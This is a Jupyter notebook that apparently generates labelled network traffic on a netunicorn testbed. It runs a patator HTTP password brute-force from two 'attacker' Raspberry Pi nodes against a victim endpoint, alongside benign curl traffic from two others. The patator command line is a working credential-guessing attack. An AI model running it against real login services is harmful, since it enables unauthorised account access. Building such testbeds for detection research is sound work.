In [1]:
import sys
sys.version

'3.9.0 (default, Nov 15 2020, 14:28:56) \n[GCC 7.3.0]'

In [2]:
%load_ext dotenv
%dotenv

In [3]:
import os

from netunicorn.base import MinionPool, Task
from netunicorn.base.experiment import Experiment, ExperimentStatus
from netunicorn.base.pipeline import Pipeline
from netunicorn.library.basic import ShellCommand
from netunicorn.client.remote import RemoteClient

In [4]:
class BenignTask(Task):
    def __init__(self, url1, url2):
        self.url1 = url1
        self.url2 = url2
    
    def run(self):
        import subprocess
        for i in range(500):
            subprocess.check_output(f'curl {self.url1}', shell=True)
            subprocess.check_output(f'curl {self.url2}', shell=True)
        return 0

In [15]:
attacker_pipeline = (
    Pipeline()
    .then(ShellCommand(
        "python ./patator.py http_fuzz "
        f"url={os.environ['VICTIM_ENDPOINT']} "
        "persistent=1 user_pass=FILE0:FILE0 0=/opt/patator/passwords.txt -x ignore:code=401"
    ))
)
attacker_pipeline.environment_definition.image = "redacted"

In [16]:
benign_pipeline = Pipeline().then(BenignTask(
    "redacted",
    "redacted",
))
benign_pipeline.environment_definition.image = "redacted"

In [17]:
client = RemoteClient(
    endpoint=os.environ['UNICORN_ENDPOINT'],
    login=os.environ['UNICORN_LOGIN'],
    password=os.environ['UNICORN_PASSWORD']
)

In [8]:
minion_pool = client.get_minion_pool()

In [18]:
attacker_pool = MinionPool([x for x in minion_pool if x.name in {
    'raspi-e4:5f:01:56:d9:a3',
    'raspi-e4:5f:01:75:6b:2c',
}])
benign_pool = MinionPool([x for x in minion_pool if x.name in {
    'raspi-dc:a6:32:d7:6e:64',
    'raspi-e4:5f:01:56:d9:8b'
}])

In [19]:
assert len(attacker_pool) == 2
assert len(benign_pool) == 2

In [20]:
experiment_label = 'connectors-salt-0.1-attack'
experiment = Experiment().map(attacker_pool, attacker_pipeline)

In [21]:
client.prepare_experiment(experiment, experiment_label)

'connectors-salt-0.1-attack'

In [22]:
client.start_execution(experiment_label)

'connectors-salt-0.1-attack'

In [23]:
experiment_label = 'connectors-salt-0.1-benign'
experiment = Experiment().map(benign_pool, benign_pipeline)

In [24]:
client.prepare_experiment(experiment, experiment_label)

'connectors-salt-0.1-benign'

In [25]:
client.start_execution(experiment_label)

'connectors-salt-0.1-benign'